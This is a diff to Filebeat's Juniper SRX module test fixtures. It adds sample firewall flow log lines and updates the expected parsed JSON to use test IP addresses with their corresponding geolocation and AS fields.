+<14>1 2020-01-19T15:18:20.040 SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE_LS [junos@2636.81.2.69.144.129 reason="TCP CLIENT RST" source-address="67.43.156.12" source-port="48873" destination-address="5.0.0.1" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="67.43.156.12" nat-source-port="48873" nat-destination-address="5.0.0.1" nat-destination-port="80" src-nat-rule-name="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="permit-all" source-zone-name="trust" destination-zone-name="untrust" session-id-32="32" packets-from-client="5" bytes-from-client="392" packets-from-server="3" bytes-from-server="646" elapsed-time="3" username="user1" roles="DEPT1" encrypted="No" destination-interface-name=”st0.0” apbr-rule-type=”default”]
+<14>1 2020-07-14T14:17:11.928Z SRX100HM RT_FLOW - APPTRACK_SESSION_VOL_UPDATE [junos@2636.81.2.69.144.129 source-address="10.1.1.100" source-port="58943" destination-address="46.165.154.241" destination-port="80" service-name="junos-http" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="6018" nat-destination-address="46.165.154.241" nat-destination-port="80" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="16118" packets-from-client="42" bytes-from-client="2322" packets-from-server="34" bytes-from-server="2132" elapsed-time="60" username="N/A" roles="N/A" encrypted="No" destination-interface-name="ge-0/0/0.0" category="N/A" sub-category="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"]
+<14>1 2020-07-13T16:43:05.041Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CLOSE [junos@2636.81.2.69.144.129 reason="idle Timeout" source-address="10.1.1.100" source-port="64720" destination-address="91.228.167.172" destination-port="8883" connection-tag="0" service-name="None" nat-source-address="172.19.34.100" nat-source-port="24519" nat-destination-address="91.228.167.172" nat-destination-port="8883" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="6" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="3851" packets-from-client="161" bytes-from-client="9530" packets-from-server="96" bytes-from-server="9670" elapsed-time="23755" application="UNKNOWN" nested-application="UNKNOWN" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" secure-web-proxy-session-type="NA" peer-session-id="0" peer-source-address="0.0.0.0" peer-source-port="0" peer-destination-address="0.0.0.0" peer-destination-port="0" hostname="NA NA" src-vrf-grp="N/A" dst-vrf-grp="N/A"]
+<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - RT_FLOW_SESSION_CREATE [junos@2636.81.2.69.144.129 source-address="10.1.1.100" source-port="49583" destination-address="175.16.199.1" destination-port="53" connection-tag="0" service-name="junos-dns-udp" nat-source-address="172.19.34.100" nat-source-port="30838" nat-destination-address="175.16.199.1" nat-destination-port="53" nat-connection-tag="0" src-nat-rule-type="source rule" src-nat-rule-name="our-nat-rule" dst-nat-rule-type="N/A" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15399" username="N/A" roles="N/A" packet-incoming-interface="ge-0/0/1.0" application="UNKNOWN" nested-application="UNKNOWN" encrypted="UNKNOWN" application-category="N/A" application-sub-category="N/A" application-risk="1" application-characteristics="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"]
+<14>1 2020-07-13T16:12:05.530Z SRX100HM RT_FLOW - APPTRACK_SESSION_CLOSE [junos@2636.81.2.69.144.129 reason="Closed by junos-alg" source-address="10.1.1.100" source-port="63381" destination-address="175.16.199.1" destination-port="53" service-name="junos-dns-udp" application="UNKNOWN" nested-application="UNKNOWN" nat-source-address="172.19.34.100" nat-source-port="26764" nat-destination-address="175.16.199.1" nat-destination-port="53" src-nat-rule-name="our-nat-rule" dst-nat-rule-name="N/A" protocol-id="17" policy-name="default-permit" source-zone-name="trust" destination-zone-name="untrust" session-id-32="15361" packets-from-client="1" bytes-from-client="66" packets-from-server="1" bytes-from-server="82" elapsed-time="3" username="N/A" roles="N/A" encrypted="No" profile-name="N/A" rule-name="N/A" routing-instance="default" destination-interface-name="ge-0/0/0.0" uplink-incoming-interface-name="N/A" uplink-tx-bytes="0" uplink-rx-bytes="0" category="N/A" sub-category="N/A" apbr-policy-name="N/A" multipath-rule-name="N/A" src-vrf-grp="N/A" dst-vrf-grp="N/A"]
diff --git a/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json b/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json
index abc4961d5937..4f4f7275fbc3 100644
--- a/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json
+++ b/x-pack/filebeat/module/juniper/srx/test/flow.log-expected.json
@@ -93,7 +93,7 @@
         "juniper.srx.session_id_32": "7087",
         "juniper.srx.tag": "RT_FLOW_SESSION_DENY",
         "log.level": "informational",
-        "log.offset": 850,
+        "log.offset": 854,
         "network.iana_number": "17",
         "observer.egress.zone": "junos-host",
         "observer.ingress.interface.name": ".local..0",
@@ -119,15 +119,8 @@
     },
     {
         "@timestamp": "2014-05-01T06:26:51.179-02:00",
-        "client.ip": "1.2.3.4",
+        "client.ip": "81.2.69.143",
         "client.port": 56639,
-        "destination.as.number": 6805,
-        "destination.as.organization.name": "Telefonica Germany",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 51.2993,
-        "destination.geo.location.lon": 9.491,
         "destination.ip": "5.6.7.8",
         "destination.port": 2003,
         "event.action": "flow_deny",
@@ -137,7 +130,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "source-address=\"1.2.3.4\" source-port=\"56639\" destination-address=\"5.6.7.8\" destination-port=\"2003\" service-name=\"None\" protocol-id=\"6\" icmp-type=\"0\" policy-name=\"log-all-else\" source-zone-name=\"campus\" destination-zone-name=\"mngmt\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth6.0\" encrypted=\"No \"",
+        "event.original": "source-address=\"81.2.69.143\" source-port=\"56639\" destination-address=\"5.6.7.8\" destination-port=\"2003\" service-name=\"None\" protocol-id=\"6\" icmp-type=\"0\" policy-name=\"log-all-else\" source-zone-name=\"campus\" destination-zone-name=\"mngmt\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth6.0\" encrypted=\"No \"",
         "event.outcome": "success",
         "event.severity": 14,
         "event.timezone": "-02:00",
@@ -152,7 +145,7 @@
         "juniper.srx.process": "RT_FLOW",
         "juniper.srx.tag": "RT_FLOW_SESSION_DENY",
         "log.level": "informational",
-        "log.offset": 1513,
+        "log.offset": 1521,
         "network.iana_number": "6",
         "observer.egress.zone": "mngmt",
         "observer.ingress.interface.name": "reth6.0",
@@ -162,22 +155,22 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "1.2.3.4",
-            "5.6.7.8"
+            "5.6.7.8",
+            "81.2.69.143"
         ],
         "rule.name": "log-all-else",
         "server.ip": "5.6.7.8",
         "server.port": 2003,
         "service.type": "juniper",
-        "source.geo.city_name": "Moscow",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RU",
-        "source.geo.country_name": "Russia",
-        "source.geo.location.lat": 55.7527,
-        "source.geo.location.lon": 37.6172,
-        "source.geo.region_iso_code": "RU-MOW",
-        "source.geo.region_name": "Moscow",
-        "source.ip": "1.2.3.4",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "source.port": 56639,
         "tags": [
             "forwarded",
@@ -187,18 +180,11 @@
     {
         "@timestamp": "2014-05-01T06:28:10.933-02:00",
         "client.bytes": 94,
-        "client.ip": "1.2.3.4",
+        "client.ip": "81.2.69.143",
         "client.nat.port": 63456,
         "client.packets": 1,
         "client.port": 63456,
-        "destination.as.number": 6805,
-        "destination.as.organization.name": "Telefonica Germany",
         "destination.bytes": 0,
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "DE",
-        "destination.geo.country_name": "Germany",
-        "destination.geo.location.lat": 51.2993,
-        "destination.geo.location.lon": 9.491,
         "destination.ip": "5.6.7.8",
         "destination.nat.ip": "5.6.7.8",
         "destination.nat.port": 902,
@@ -213,7 +199,7 @@
         "event.end": "2014-05-01T06:29:10.933-02:00",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "reason=\"unset\" source-address=\"1.2.3.4\" source-port=\"63456\" destination-address=\"5.6.7.8\" destination-port=\"902\" service-name=\"None\" nat-source-address=\"1.2.3.4\" nat-source-port=\"63456\" nat-destination-address=\"5.6.7.8\" nat-destination-port=\"902\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"17\" policy-name=\"mngmt-to-vcenter\" source-zone-name=\"mngmt\" destination-zone-name=\"intra\" session-id-32=\"15353\" packets-from-client=\"1\" bytes-from-client=\"94\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"60\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth3.5\" encrypted=\"No \"",
+        "event.original": "reason=\"unset\" source-address=\"81.2.69.143\" source-port=\"63456\" destination-address=\"5.6.7.8\" destination-port=\"902\" service-name=\"None\" nat-source-address=\"81.2.69.143\" nat-source-port=\"63456\" nat-destination-address=\"5.6.7.8\" nat-destination-port=\"902\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"17\" policy-name=\"mngmt-to-vcenter\" source-zone-name=\"mngmt\" destination-zone-name=\"intra\" session-id-32=\"15353\" packets-from-client=\"1\" bytes-from-client=\"94\" packets-from-server=\"0\" bytes-from-server=\"0\" elapsed-time=\"60\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth3.5\" encrypted=\"No \"",
         "event.outcome": "success",
         "event.severity": 14,
         "event.start": "2014-05-01T06:28:10.933-02:00",
@@ -231,7 +217,7 @@
         "juniper.srx.session_id_32": "15353",
         "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE",
         "log.level": "informational",
-        "log.offset": 1966,
+        "log.offset": 1982,
         "network.bytes": 94,
         "network.iana_number": "17",
         "network.packets": 1,
@@ -243,8 +229,8 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "1.2.3.4",
-            "5.6.7.8"
+            "5.6.7.8",
+            "81.2.69.143"
         ],
         "rule.name": "mngmt-to-vcenter",
         "server.bytes": 0,
@@ -254,16 +240,16 @@
         "server.port": 902,
         "service.type": "juniper",
         "source.bytes": 94,
-        "source.geo.city_name": "Moscow",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RU",
-        "source.geo.country_name": "Russia",
-        "source.geo.location.lat": 55.7527,
-        "source.geo.location.lon": 37.6172,
-        "source.geo.region_iso_code": "RU-MOW",
-        "source.geo.region_name": "Moscow",
-        "source.ip": "1.2.3.4",
-        "source.nat.ip": "1.2.3.4",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
+        "source.nat.ip": "81.2.69.143",
         "source.nat.port": 63456,
         "source.packets": 1,
         "source.port": 63456,
@@ -274,14 +260,9 @@
     },
     {
         "@timestamp": "2013-11-04T14:23:09.264-02:00",
-        "client.ip": "50.0.0.100",
+        "client.ip": "175.16.199.1",
         "client.nat.port": 24065,
         "client.port": 24065,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "30.0.0.100",
         "destination.nat.ip": "30.0.0.100",
         "destination.nat.port": 768,
@@ -293,7 +274,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "source-address=\"50.0.0.100\" source-port=\"24065\" destination-address=\"30.0.0.100\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"50.0.0.100\" nat-source-port=\"24065\" nat-destination-address=\"30.0.0.100\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"",
+        "event.original": "source-address=\"175.16.199.1\" source-port=\"24065\" destination-address=\"30.0.0.100\" destination-port=\"768\" service-name=\"icmp\" nat-source-address=\"175.16.199.1\" nat-source-port=\"24065\" nat-destination-address=\"30.0.0.100\" nat-destination-port=\"768\" src-nat-rule-name=\"None\" dst-nat-rule-name=\"None\" protocol-id=\"1\" policy-name=\"alg-policy\" source-zone-name=\"untrust\" destination-zone-name=\"trust\" session-id-32=\"100000165\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth2.0\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" encrypted=\"UNKNOWN\"",
         "event.outcome": "success",
         "event.severity": 14,
         "event.timezone": "-02:00",
@@ -309,7 +290,7 @@
         "juniper.srx.session_id_32": "100000165",
         "juniper.srx.tag": "RT_FLOW_SESSION_CREATE",
         "log.level": "informational",
-        "log.offset": 2721,
+        "log.offset": 2749,
         "network.iana_number": "1",
         "observer.egress.zone": "trust",
         "observer.ingress.interface.name": "reth2.0",
@@ -319,21 +300,24 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "30.0.0.100",
-            "50.0.0.100"
+            "175.16.199.1",
+            "30.0.0.100"
         ],
         "rule.name": "alg-policy",
         "server.ip": "30.0.0.100",
         "server.nat.port": 768,
         "server.port": 768,
         "service.type": "juniper",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "50.0.0.100",
-        "source.nat.ip": "50.0.0.100",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
+        "source.nat.ip": "175.16.199.1",
         "source.nat.port": 24065,
         "source.port": 24065,
         "tags": [
@@ -346,11 +330,8 @@
         "client.ip": "192.0.2.1",
         "client.nat.port": 1,
         "client.port": 1,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
+        "destination.as.number": 3,
+        "destination.as.organization.name": "Massachusetts Institute of Technology",
         "destination.ip": "198.51.100.12",
         "destination.nat.ip": "18.51.100.12",
         "destination.nat.port": 46384,
@@ -378,7 +359,7 @@
         "juniper.srx.session_id_32": "41",
         "juniper.srx.tag": "RT_FLOW_SESSION_CREATE",
         "log.level": "informational",
-        "log.offset": 3366,
+        "log.offset": 3402,
         "network.iana_number": "1",
         "observer.egress.zone": "untrustZone",
         "observer.ingress.interface.name": "ge-0/0/1.0",
@@ -413,12 +394,9 @@
         "client.nat.port": 1,
         "client.packets": 1,
         "client.port": 1,
+        "destination.as.number": 3,
+        "destination.as.organization.name": "Massachusetts Institute of Technology",
         "destination.bytes": 84,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "198.51.100.12",
         "destination.nat.ip": "18.51.100.12",
         "destination.nat.port": 46384,
@@ -451,7 +429,7 @@
         "juniper.srx.session_id_32": "41",
         "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE",
         "log.level": "informational",
-        "log.offset": 3933,
+        "log.offset": 3969,
         "network.bytes": 168,
         "network.iana_number": "1",
         "network.packets": 2,
@@ -492,14 +470,7 @@
         "client.nat.port": 19162,
         "client.packets": 6,
         "client.port": 47776,
-        "destination.as.number": 14627,
-        "destination.as.organization.name": "Vitalwerks Internet Solutions, LLC",
         "destination.bytes": 535,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "8.23.224.110",
         "destination.nat.ip": "8.23.224.110",
         "destination.nat.port": 80,
@@ -541,7 +512,7 @@
         "juniper.srx.src_nat_rule_type": "source rule",
         "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE",
         "log.level": "informational",
-        "log.offset": 4637,
+        "log.offset": 4673,
         "network.bytes": 872,
         "network.iana_number": "6",
         "network.packets": 10,
@@ -615,7 +586,7 @@
         "juniper.srx.session_id_32": "206",
         "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE",
         "log.level": "informational",
-        "log.offset": 5739,
+        "log.offset": 5779,
         "network.bytes": 5849,
         "network.iana_number": "6",
         "network.packets": 22,
@@ -651,18 +622,11 @@
     {
         "@timestamp": "2018-10-06T23:32:20.898-02:00",
         "client.bytes": 72,
-        "client.ip": "100.73.10.92",
+        "client.ip": "67.43.156.14",
         "client.nat.port": 11152,
         "client.packets": 1,
         "client.port": 52890,
-        "destination.as.number": 10201,
-        "destination.as.organization.name": "Dishnet Wireless Limited. Broadband Wireless",
         "destination.bytes": 136,
-        "destination.geo.continent_name": "Asia",
-        "destination.geo.country_iso_code": "IN",
-        "destination.geo.country_name": "India",
-        "destination.geo.location.lat": 20.0,
-        "destination.geo.location.lon": 77.0,
         "destination.ip": "58.68.126.198",
         "destination.nat.ip": "58.68.126.198",
         "destination.nat.port": 53,
@@ -677,7 +641,7 @@
         "event.end": "2018-10-06T23:32:28.898-02:00",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "reason=\"idle Timeout\" source-address=\"100.73.10.92\" source-port=\"52890\" destination-address=\"58.68.126.198\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"58.78.140.131\" nat-source-port=\"11152\" nat-destination-address=\"58.68.126.198\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"NAT_S\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"NAT\" source-zone-name=\"Gi_nat\" destination-zone-name=\"Internet\" session-id-32=\"220368889\" packets-from-client=\"1\" bytes-from-client=\"72\" packets-from-server=\"1\" bytes-from-server=\"136\" elapsed-time=\"8\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.108\" encrypted=\"UNKNOWN\"",
+        "event.original": "reason=\"idle Timeout\" source-address=\"67.43.156.14\" source-port=\"52890\" destination-address=\"58.68.126.198\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"58.78.140.131\" nat-source-port=\"11152\" nat-destination-address=\"58.68.126.198\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"NAT_S\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"NAT\" source-zone-name=\"Gi_nat\" destination-zone-name=\"Internet\" session-id-32=\"220368889\" packets-from-client=\"1\" bytes-from-client=\"72\" packets-from-server=\"1\" bytes-from-server=\"136\" elapsed-time=\"8\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"reth0.108\" encrypted=\"UNKNOWN\"",
         "event.outcome": "success",
         "event.severity": 14,
         "event.start": "2018-10-06T23:32:20.898-02:00",
@@ -697,7 +661,7 @@
         "juniper.srx.src_nat_rule_type": "source rule",
         "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE",
         "log.level": "informational",
-        "log.offset": 6497,
+        "log.offset": 6541,
         "network.bytes": 208,
         "network.iana_number": "17",
         "network.packets": 2,
@@ -709,9 +673,9 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
-            "100.73.10.92",
             "58.68.126.198",
-            "58.78.140.131"
+            "58.78.140.131",
+            "67.43.156.14"
         ],
         "rule.name": "NAT",
         "server.bytes": 136,
@@ -720,18 +684,14 @@
         "server.packets": 1,
         "server.port": 53,
         "service.type": "juniper",
-        "source.as.number": 3786,
-        "source.as.organization.name": "LG DACOM Corporation",
+        "source.as.number": 35908,
         "source.bytes": 72,
-        "source.geo.city_name": "Seogwipo",
         "source.geo.continent_name": "Asia",
-        "source.geo.country_iso_code": "KR",
-        "source.geo.country_name": "South Korea",
-        "source.geo.location.lat": 33.2486,
-        "source.geo.location.lon": 126.5628,
-        "source.geo.region_iso_code": "KR-49",
-        "source.geo.region_name": "Jeju-do",
-        "source.ip": "100.73.10.92",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.14",
         "source.nat.ip": "58.78.140.131",
         "source.nat.port": 11152,
         "source.packets": 1,
@@ -748,16 +708,17 @@
         "client.nat.port": 20215,
         "client.packets": 1,
         "client.port": 62047,
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
         "destination.bytes": 116,
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
-        "destination.nat.ip": "8.8.8.8",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
+        "destination.nat.ip": "175.16.199.1",
         "destination.nat.port": 53,
         "destination.packets": 1,
         "destination.port": 53,
@@ -770,7 +731,7 @@
         "event.end": "2018-06-30T00:17:25.753-02:00",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "reason=\"idle Timeout\" source-address=\"192.168.255.2\" source-port=\"62047\" destination-address=\"8.8.8.8\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"192.168.0.47\" nat-source-port=\"20215\" nat-destination-address=\"8.8.8.8\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"rule001\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"trust-to-untrust-001\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"9621\" packets-from-client=\"1\" bytes-from-client=\"67\" packets-from-server=\"1\" bytes-from-server=\"116\" elapsed-time=\"3\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"fe-0/0/1.0\" encrypted=\"UNKNOWN\"",
+        "event.original": "reason=\"idle Timeout\" source-address=\"192.168.255.2\" source-port=\"62047\" destination-address=\"175.16.199.1\" destination-port=\"53\" service-name=\"junos-dns-udp\" nat-source-address=\"192.168.0.47\" nat-source-port=\"20215\" nat-destination-address=\"175.16.199.1\" nat-destination-port=\"53\" src-nat-rule-type=\"source rule\" src-nat-rule-name=\"rule001\" dst-nat-rule-type=\"N/A\" dst-nat-rule-name=\"N/A\" protocol-id=\"17\" policy-name=\"trust-to-untrust-001\" source-zone-name=\"trust\" destination-zone-name=\"untrust\" session-id-32=\"9621\" packets-from-client=\"1\" bytes-from-client=\"67\" packets-from-server=\"1\" bytes-from-server=\"116\" elapsed-time=\"3\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" username=\"N/A\" roles=\"N/A\" packet-incoming-interface=\"fe-0/0/1.0\" encrypted=\"UNKNOWN\"",
         "event.outcome": "success",
         "event.severity": 14,
         "event.start": "2018-06-30T00:17:22.753-02:00",
@@ -790,7 +751,7 @@
         "juniper.srx.src_nat_rule_type": "source rule",
         "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE",
         "log.level": "informational",
-        "log.offset": 7350,
+        "log.offset": 7398,
         "network.bytes": 183,
         "network.iana_number": "17",
         "network.packets": 2,
@@ -802,13 +763,13 @@
         "observer.type": "firewall",
         "observer.vendor": "Juniper",
         "related.ip": [
+            "175.16.199.1",
             "192.168.0.47",
-            "192.168.255.2",
-            "8.8.8.8"
+            "192.168.255.2"
         ],
         "rule.name": "trust-to-untrust-001",
         "server.bytes": 116,
-        "server.ip": "8.8.8.8",
+        "server.ip": "175.16.199.1",
         "server.nat.port": 53,
         "server.packets": 1,
         "server.port": 53,
@@ -867,7 +828,7 @@
         "juniper.srx.src_nat_rule_name": "SNAT-Policy5",
         "juniper.srx.tag": "RT_FLOW_SESSION_CLOSE",
         "log.level": "informational",
-        "log.offset": 8203,
+        "log.offset": 8265,
         "network.bytes": 0,
         "network.iana_number": "6",
         "network.packets": 0,
@@ -904,16 +865,9 @@
     },
     {
         "@timestamp": "2013-01-19T15:18:17.040-02:00",
-        "client.ip": "192.168.224.30",
+        "client.ip": "67.43.156.12",
         "client.nat.port": 14406,
         "client.port": 3129,
-        "destination.as.number": 701,
-        "destination.as.organization.name": "MCI Communications Services, Inc. d/b/a Verizon Business",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "207.17.137.56",
         "destination.nat.ip": "207.17.137.56",
         "destination.nat.port": 21,
@@ -925,7 +879,7 @@
         "event.dataset": "juniper.srx",
         "event.kind": "event",
         "event.module": "juniper",
-        "event.original": "source-address=\"192.168.224.30\" source-port=\"3129\" destination-address=\"207.17.137.56\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"173.167.224.7\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"",
+        "event.original": "source-address=\"67.43.156.12\" source-port=\"3129\" destination-address=\"207.17.137.56\" destination-port=\"21\" service-name=\"junos-ftp\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" nat-source-address=\"173.167.224.7\" nat-source-port=\"14406\" nat-destination-address=\"207.17.137.56\" nat-destination-port=\"21\" src-nat-rule-name=\"1\" dst-nat-rule-name=\"None\" protocol-id=\"6\" policy-name=\"General-Outbound\" source-zone-name=\"LAN\" destination-zone-name=\"Danger\" session-id-32=\"5058\" username=\"N/A\" roles=\"N/A\" encrypted=\"N/A\"",
         "event.outcome": "success",
         "event.severity": 14,
         "event.timezone": "-02:00",
@@ -942,7 +896,7 @@
         "juniper.srx.src_nat_rule_name": "1",
         "juniper.srx.tag": "APPTRACK_SESSION_CREATE",
         "log.level": "informational",
-        "log.offset": 9012,
+        "log.offset": 9078,
         "network.iana_number": "6",
         "observer.egress.zone": "Danger",
         "observer.ingress.zone": "LAN",
@@ -952,25 +906,21 @@
         "observer.vendor": "Juniper",
         "related.ip": [
             "173.167.224.7",
-            "192.168.224.30",
-            "207.17.137.56"
+            "207.17.137.56",
+            "67.43.156.12"
         ],
         "rule.name": "General-Outbound",
         "server.ip": "207.17.137.56",
         "server.nat.port": 21,
         "server.port": 21,
         "service.type": "juniper",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "Plymouth",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 42.3695,
-        "source.geo.location.lon": -83.4769,
-        "source.geo.region_iso_code": "US-MI",
-        "source.geo.region_name": "Michigan",
-        "source.ip": "192.168.224.30",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.12",
         "source.nat.ip": "173.167.224.7",
         "source.nat.port": 14406,
         "source.port": 3129,
@@ -982,18 +932,11 @@
     {
         "@timestamp": "2013-01-19T15:18:17.040-02:00",
         "client.bytes": 48,
-        "client.ip": "192.168.224.30",
